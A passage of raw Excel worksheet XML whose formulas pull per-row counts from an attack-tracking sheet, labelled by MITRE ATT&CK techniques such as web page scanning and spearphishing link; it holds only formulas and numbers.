        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BM101,"")</f>
        <v>0</v>
      </c>
      <c r="O101" s="532">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($K101=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P101" s="292">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BN101,"")</f>
        <v>0</v>
      </c>
      <c r="Q101" s="322">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BP101,"")</f>
        <v>0</v>
      </c>
      <c r="R101" s="4">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BR101,"")</f>
        <v>0</v>
      </c>
      <c r="S101" s="20">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BS101,"")</f>
        <v>0</v>
      </c>
      <c r="T101" s="530">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($P101=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U101" s="322">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BT101,"")</f>
        <v>342</v>
      </c>
      <c r="V101" s="322">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BV101,"")</f>
        <v>342</v>
      </c>
      <c r="W101" s="4">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BX101,"")</f>
        <v>3</v>
      </c>
      <c r="X101" s="20">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BY101,"")</f>
        <v>171</v>
      </c>
      <c r="Y101" s="532">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($U101=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z101" s="288">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!BZ101,"")</f>
        <v>175</v>
      </c>
      <c r="AA101" s="392">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!CB101,"")</f>
        <v>173</v>
      </c>
      <c r="AB101" s="4">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!CD101,"")</f>
        <v>5</v>
      </c>
      <c r="AC101" s="20">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!CE101,"")</f>
        <v>58</v>
      </c>
      <c r="AD101" s="331">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF(Z101=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE101" s="322">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CF101,"")</f>
        <v>517</v>
      </c>
      <c r="AF101" s="322">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CH101,"")</f>
        <v>515</v>
      </c>
      <c r="AG101" s="4">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CJ101,"")</f>
        <v>8</v>
      </c>
      <c r="AH101" s="20">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CK101,"")</f>
        <v>171</v>
      </c>
      <c r="AI101" s="287">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($AE101=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ101" s="292">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CL101,"")</f>
        <v>0</v>
      </c>
      <c r="AK101" s="322">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CN101,"")</f>
        <v>0</v>
      </c>
      <c r="AL101" s="4">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CP101,"")</f>
        <v>0</v>
      </c>
      <c r="AM101" s="20">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CQ101,"")</f>
        <v>0</v>
      </c>
      <c r="AN101" s="331">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($AJ101=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO101" s="322">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CR101,"")</f>
        <v>0</v>
      </c>
      <c r="AP101" s="322">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CT101,"")</f>
        <v>0</v>
      </c>
      <c r="AQ101" s="4">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CV101,"")</f>
        <v>0</v>
      </c>
      <c r="AR101" s="20">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$CW101,"")</f>
        <v>0</v>
      </c>
      <c r="AS101" s="287">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($AO101=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT101" s="288">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!CX101,"")</f>
        <v>0</v>
      </c>
      <c r="AU101" s="392">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!CZ101,"")</f>
        <v>0</v>
      </c>
      <c r="AV101" s="4">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!DB101,"")</f>
        <v>0</v>
      </c>
      <c r="AW101" s="20">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!DC101,"")</f>
        <v>0</v>
      </c>
      <c r="AX101" s="331">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($AT101=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY101" s="469">
        <f>'(A) Ataques'!LU101+'(A) Ataques'!MA101+'(A) Ataques'!MG101+'(A) Ataques'!MM101+'(A) Ataques'!MS101</f>
        <v>0</v>
      </c>
      <c r="AZ101" s="510">
        <f>'(A) Ataques'!LW101+'(A) Ataques'!MC101+'(A) Ataques'!MI101+'(A) Ataques'!MO101+'(A) Ataques'!MU101</f>
        <v>0</v>
      </c>
      <c r="BA101" s="471">
        <f>'(A) Ataques'!LY101+'(A) Ataques'!ME101+'(A) Ataques'!MK101+'(A) Ataques'!MQ101+'(A) Ataques'!MW101</f>
        <v>0</v>
      </c>
      <c r="BB101" s="471">
        <f>'(A) Ataques'!LQ101</f>
        <v>0</v>
      </c>
      <c r="BC101" s="331">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($AY101=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD101" s="469">
        <f>IF('(A) Ataques'!$AP101&lt;&gt;"NO",'(A) Ataques'!LL101,"")</f>
        <v>171</v>
      </c>
      <c r="BE101" s="510">
        <f>IF('(A) Ataques'!$AP101&lt;&gt;"NO",'(A) Ataques'!LM101,"")</f>
        <v>171</v>
      </c>
      <c r="BF101" s="471">
        <f>IF('(A) Ataques'!$AP101&lt;&gt;"NO",'(A) Ataques'!LN101,"")</f>
        <v>0</v>
      </c>
      <c r="BG101" s="471">
        <f>IF('(A) Ataques'!$AP101&lt;&gt;"NO",'(A) Ataques'!LO101,"")</f>
        <v>1</v>
      </c>
      <c r="BH101" s="471">
        <f>IF('(A) Ataques'!$AP101&lt;&gt;"NO",'(A) Ataques'!LS101,"")</f>
        <v>171</v>
      </c>
      <c r="BI101" s="331">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($BD101=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ101" s="469">
        <f>'(A) Ataques'!OL101+'(A) Ataques'!OR101+'(A) Ataques'!OX101+'(A) Ataques'!PD101+'(A) Ataques'!PJ101</f>
        <v>191</v>
      </c>
      <c r="BK101" s="510">
        <f>'(A) Ataques'!ON101+'(A) Ataques'!OT101+'(A) Ataques'!OZ101+'(A) Ataques'!PF101+'(A) Ataques'!PL101</f>
        <v>191</v>
      </c>
      <c r="BL101" s="471">
        <f>'(A) Ataques'!OP101+'(A) Ataques'!OV101+'(A) Ataques'!PB101+'(A) Ataques'!PH101+'(A) Ataques'!PN101</f>
        <v>4</v>
      </c>
      <c r="BM101" s="495">
        <f>'(A) Ataques'!OH101</f>
        <v>169</v>
      </c>
      <c r="BN101" s="331">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($BJ101=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO101" s="469">
        <f>IF('(A) Ataques'!$AP101&lt;&gt;"NO",'(A) Ataques'!OC101,"")</f>
        <v>191</v>
      </c>
      <c r="BP101" s="510">
        <f>IF('(A) Ataques'!$AP101&lt;&gt;"NO",'(A) Ataques'!OD101,"")</f>
        <v>191</v>
      </c>
      <c r="BQ101" s="471">
        <f>IF('(A) Ataques'!$AP101&lt;&gt;"NO",'(A) Ataques'!OE101,"")</f>
        <v>4</v>
      </c>
      <c r="BR101" s="471">
        <f>IF('(A) Ataques'!$AP101&lt;&gt;"NO",'(A) Ataques'!OF101,"")</f>
        <v>1</v>
      </c>
      <c r="BS101" s="471">
        <f>IF('(A) Ataques'!$AP101&lt;&gt;"NO",'(A) Ataques'!OJ101,"")</f>
        <v>169</v>
      </c>
      <c r="BT101" s="331">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($BO101=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="102" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A102" s="79">
        <f t="shared" si="1"/>
        <v>100</v>
      </c>
      <c r="B102" s="4">
        <f>IF('(A) Ataques'!AK102&lt;&gt;"NO",'(A) Ataques'!E102,"")</f>
        <v>68</v>
      </c>
      <c r="C102" s="6" t="str">
        <f>IF('(A) Ataques'!AK102&lt;&gt;"NO",IF('(A) Ataques'!M102="","",'(A) Ataques'!M102),"")</f>
        <v>T1595.003-Web_page_scanning2</v>
      </c>
      <c r="D102" s="4" t="str">
        <f>IF('(A) Ataques'!AK102&lt;&gt;"NO",'(A) Ataques'!F102,"")</f>
        <v>T1595</v>
      </c>
      <c r="E102" s="286">
        <f>IF('(A) Ataques'!AK102&lt;&gt;"NO",'(A) Ataques'!AQ102,"")</f>
        <v>335</v>
      </c>
      <c r="F102" s="288">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!BB102,"")</f>
        <v>183</v>
      </c>
      <c r="G102" s="392">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!BD102,"")</f>
        <v>183</v>
      </c>
      <c r="H102" s="4">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!BF102,"")</f>
        <v>1</v>
      </c>
      <c r="I102" s="20">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!BG102,"")</f>
        <v>183</v>
      </c>
      <c r="J102" s="530">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($F102=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K102" s="322">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BH102,"")</f>
        <v>21</v>
      </c>
      <c r="L102" s="322">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BJ102,"")</f>
        <v>21</v>
      </c>
      <c r="M102" s="4">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BL102,"")</f>
        <v>14</v>
      </c>
      <c r="N102" s="20">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BM102,"")</f>
        <v>14</v>
      </c>
      <c r="O102" s="532">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($K102=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P102" s="292">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BN102,"")</f>
        <v>204</v>
      </c>
      <c r="Q102" s="322">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BP102,"")</f>
        <v>204</v>
      </c>
      <c r="R102" s="4">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BR102,"")</f>
        <v>15</v>
      </c>
      <c r="S102" s="20">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BS102,"")</f>
        <v>184</v>
      </c>
      <c r="T102" s="530">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($P102=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U102" s="322">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BT102,"")</f>
        <v>9422</v>
      </c>
      <c r="V102" s="322">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BV102,"")</f>
        <v>774</v>
      </c>
      <c r="W102" s="4">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BX102,"")</f>
        <v>51</v>
      </c>
      <c r="X102" s="20">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$BY102,"")</f>
        <v>260</v>
      </c>
      <c r="Y102" s="532">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($U102=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z102" s="288">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!BZ102,"")</f>
        <v>193</v>
      </c>
      <c r="AA102" s="392">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!CB102,"")</f>
        <v>128</v>
      </c>
      <c r="AB102" s="4">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!CD102,"")</f>
        <v>26</v>
      </c>
      <c r="AC102" s="20">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!CE102,"")</f>
        <v>95</v>
      </c>
      <c r="AD102" s="331">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF(Z102=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE102" s="322">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CF102,"")</f>
        <v>9615</v>
      </c>
      <c r="AF102" s="322">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CH102,"")</f>
        <v>902</v>
      </c>
      <c r="AG102" s="4">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CJ102,"")</f>
        <v>77</v>
      </c>
      <c r="AH102" s="20">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CK102,"")</f>
        <v>260</v>
      </c>
      <c r="AI102" s="287">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($AE102=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ102" s="292">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CL102,"")</f>
        <v>0</v>
      </c>
      <c r="AK102" s="322">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CN102,"")</f>
        <v>0</v>
      </c>
      <c r="AL102" s="4">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CP102,"")</f>
        <v>0</v>
      </c>
      <c r="AM102" s="20">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CQ102,"")</f>
        <v>0</v>
      </c>
      <c r="AN102" s="331">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($AJ102=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO102" s="322">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CR102,"")</f>
        <v>63</v>
      </c>
      <c r="AP102" s="322">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CT102,"")</f>
        <v>62</v>
      </c>
      <c r="AQ102" s="4">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CV102,"")</f>
        <v>44</v>
      </c>
      <c r="AR102" s="20">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!$CW102,"")</f>
        <v>37</v>
      </c>
      <c r="AS102" s="287">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($AO102=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT102" s="288">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!CX102,"")</f>
        <v>267</v>
      </c>
      <c r="AU102" s="392">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!CZ102,"")</f>
        <v>266</v>
      </c>
      <c r="AV102" s="4">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!DB102,"")</f>
        <v>59</v>
      </c>
      <c r="AW102" s="20">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",'(A) Ataques'!DC102,"")</f>
        <v>185</v>
      </c>
      <c r="AX102" s="331">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($AT102=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY102" s="469">
        <f>'(A) Ataques'!LU102+'(A) Ataques'!MA102+'(A) Ataques'!MG102+'(A) Ataques'!MM102+'(A) Ataques'!MS102</f>
        <v>6</v>
      </c>
      <c r="AZ102" s="510">
        <f>'(A) Ataques'!LW102+'(A) Ataques'!MC102+'(A) Ataques'!MI102+'(A) Ataques'!MO102+'(A) Ataques'!MU102</f>
        <v>6</v>
      </c>
      <c r="BA102" s="471">
        <f>'(A) Ataques'!LY102+'(A) Ataques'!ME102+'(A) Ataques'!MK102+'(A) Ataques'!MQ102+'(A) Ataques'!MW102</f>
        <v>6</v>
      </c>
      <c r="BB102" s="471">
        <f>'(A) Ataques'!LQ102</f>
        <v>6</v>
      </c>
      <c r="BC102" s="331">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($AY102=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD102" s="469">
        <f>IF('(A) Ataques'!$AP102&lt;&gt;"NO",'(A) Ataques'!LL102,"")</f>
        <v>266</v>
      </c>
      <c r="BE102" s="510">
        <f>IF('(A) Ataques'!$AP102&lt;&gt;"NO",'(A) Ataques'!LM102,"")</f>
        <v>266</v>
      </c>
      <c r="BF102" s="471">
        <f>IF('(A) Ataques'!$AP102&lt;&gt;"NO",'(A) Ataques'!LN102,"")</f>
        <v>6</v>
      </c>
      <c r="BG102" s="471">
        <f>IF('(A) Ataques'!$AP102&lt;&gt;"NO",'(A) Ataques'!LO102,"")</f>
        <v>1</v>
      </c>
      <c r="BH102" s="471">
        <f>IF('(A) Ataques'!$AP102&lt;&gt;"NO",'(A) Ataques'!LS102,"")</f>
        <v>260</v>
      </c>
      <c r="BI102" s="331">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($BD102=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ102" s="469">
        <f>'(A) Ataques'!OL102+'(A) Ataques'!OR102+'(A) Ataques'!OX102+'(A) Ataques'!PD102+'(A) Ataques'!PJ102</f>
        <v>4530</v>
      </c>
      <c r="BK102" s="510">
        <f>'(A) Ataques'!ON102+'(A) Ataques'!OT102+'(A) Ataques'!OZ102+'(A) Ataques'!PF102+'(A) Ataques'!PL102</f>
        <v>260</v>
      </c>
      <c r="BL102" s="471">
        <f>'(A) Ataques'!OP102+'(A) Ataques'!OV102+'(A) Ataques'!PB102+'(A) Ataques'!PH102+'(A) Ataques'!PN102</f>
        <v>2</v>
      </c>
      <c r="BM102" s="495">
        <f>'(A) Ataques'!OH102</f>
        <v>259</v>
      </c>
      <c r="BN102" s="331">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($BJ102=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO102" s="469">
        <f>IF('(A) Ataques'!$AP102&lt;&gt;"NO",'(A) Ataques'!OC102,"")</f>
        <v>4530</v>
      </c>
      <c r="BP102" s="510">
        <f>IF('(A) Ataques'!$AP102&lt;&gt;"NO",'(A) Ataques'!OD102,"")</f>
        <v>260</v>
      </c>
      <c r="BQ102" s="471">
        <f>IF('(A) Ataques'!$AP102&lt;&gt;"NO",'(A) Ataques'!OE102,"")</f>
        <v>2</v>
      </c>
      <c r="BR102" s="471">
        <f>IF('(A) Ataques'!$AP102&lt;&gt;"NO",'(A) Ataques'!OF102,"")</f>
        <v>1</v>
      </c>
      <c r="BS102" s="471">
        <f>IF('(A) Ataques'!$AP102&lt;&gt;"NO",'(A) Ataques'!OJ102,"")</f>
        <v>259</v>
      </c>
      <c r="BT102" s="331">
        <f>IF('(A) Ataques'!$AK102&lt;&gt;"NO",IF($BO102=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="103" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A103" s="79">
        <f t="shared" si="1"/>
        <v>101</v>
      </c>
      <c r="B103" s="4">
        <f>IF('(A) Ataques'!AK103&lt;&gt;"NO",'(A) Ataques'!E103,"")</f>
        <v>69</v>
      </c>
      <c r="C103" s="6" t="str">
        <f>IF('(A) Ataques'!AK103&lt;&gt;"NO",IF('(A) Ataques'!M103="","",'(A) Ataques'!M103),"")</f>
        <v>T1598.003-Spearphishing_Link</v>
      </c>
      <c r="D103" s="4" t="str">
        <f>IF('(A) Ataques'!AK103&lt;&gt;"NO",'(A) Ataques'!F103,"")</f>
        <v>T1598</v>
      </c>
      <c r="E103" s="286">
        <f>IF('(A) Ataques'!AK103&lt;&gt;"NO",'(A) Ataques'!AQ103,"")</f>
        <v>59</v>
      </c>
      <c r="F103" s="288">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!BB103,"")</f>
        <v>7</v>
      </c>
      <c r="G103" s="392">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!BD103,"")</f>
        <v>5</v>
      </c>
      <c r="H103" s="4">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!BF103,"")</f>
        <v>3</v>
      </c>
      <c r="I103" s="20">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!BG103,"")</f>
        <v>4</v>
      </c>
      <c r="J103" s="530">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($F103=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K103" s="322">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BH103,"")</f>
        <v>9</v>
      </c>
      <c r="L103" s="322">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BJ103,"")</f>
        <v>9</v>
      </c>
      <c r="M103" s="4">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BL103,"")</f>
        <v>3</v>
      </c>
      <c r="N103" s="20">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BM103,"")</f>
        <v>5</v>
      </c>
      <c r="O103" s="532">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($K103=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P103" s="292">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BN103,"")</f>
        <v>16</v>
      </c>
      <c r="Q103" s="322">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BP103,"")</f>
        <v>14</v>
      </c>
      <c r="R103" s="4">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BR103,"")</f>
        <v>6</v>
      </c>
      <c r="S103" s="20">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BS103,"")</f>
        <v>8</v>
      </c>
      <c r="T103" s="530">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($P103=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U103" s="322">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BT103,"")</f>
        <v>14</v>
      </c>
      <c r="V103" s="322">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BV103,"")</f>
        <v>11</v>
      </c>
      <c r="W103" s="4">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BX103,"")</f>
        <v>6</v>
      </c>
      <c r="X103" s="20">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$BY103,"")</f>
        <v>6</v>
      </c>
      <c r="Y103" s="532">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($U103=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z103" s="288">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!BZ103,"")</f>
        <v>34</v>
      </c>
      <c r="AA103" s="392">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!CB103,"")</f>
        <v>26</v>
      </c>
      <c r="AB103" s="4">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!CD103,"")</f>
        <v>10</v>
      </c>
      <c r="AC103" s="20">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!CE103,"")</f>
        <v>15</v>
      </c>
      <c r="AD103" s="331">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF(Z103=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE103" s="322">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CF103,"")</f>
        <v>48</v>
      </c>
      <c r="AF103" s="322">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CH103,"")</f>
        <v>37</v>
      </c>
      <c r="AG103" s="4">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CJ103,"")</f>
        <v>16</v>
      </c>
      <c r="AH103" s="20">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CK103,"")</f>
        <v>18</v>
      </c>
      <c r="AI103" s="287">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($AE103=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ103" s="292">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CL103,"")</f>
        <v>0</v>
      </c>
      <c r="AK103" s="322">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CN103,"")</f>
        <v>0</v>
      </c>
      <c r="AL103" s="4">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CP103,"")</f>
        <v>0</v>
      </c>
      <c r="AM103" s="20">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CQ103,"")</f>
        <v>0</v>
      </c>
      <c r="AN103" s="331">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($AJ103=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO103" s="322">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CR103,"")</f>
        <v>2</v>
      </c>
      <c r="AP103" s="322">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CT103,"")</f>
        <v>1</v>
      </c>
      <c r="AQ103" s="4">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CV103,"")</f>
        <v>1</v>
      </c>
      <c r="AR103" s="20">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!$CW103,"")</f>
        <v>1</v>
      </c>
      <c r="AS103" s="287">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($AO103=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT103" s="288">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!CX103,"")</f>
        <v>18</v>
      </c>
      <c r="AU103" s="392">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!CZ103,"")</f>
        <v>15</v>
      </c>
      <c r="AV103" s="4">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!DB103,"")</f>
        <v>7</v>
      </c>
      <c r="AW103" s="20">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",'(A) Ataques'!DC103,"")</f>
        <v>8</v>
      </c>
      <c r="AX103" s="331">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($AT103=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY103" s="469">
        <f>'(A) Ataques'!LU103+'(A) Ataques'!MA103+'(A) Ataques'!MG103+'(A) Ataques'!MM103+'(A) Ataques'!MS103</f>
        <v>0</v>
      </c>
      <c r="AZ103" s="510">
        <f>'(A) Ataques'!LW103+'(A) Ataques'!MC103+'(A) Ataques'!MI103+'(A) Ataques'!MO103+'(A) Ataques'!MU103</f>
        <v>0</v>
      </c>
      <c r="BA103" s="471">
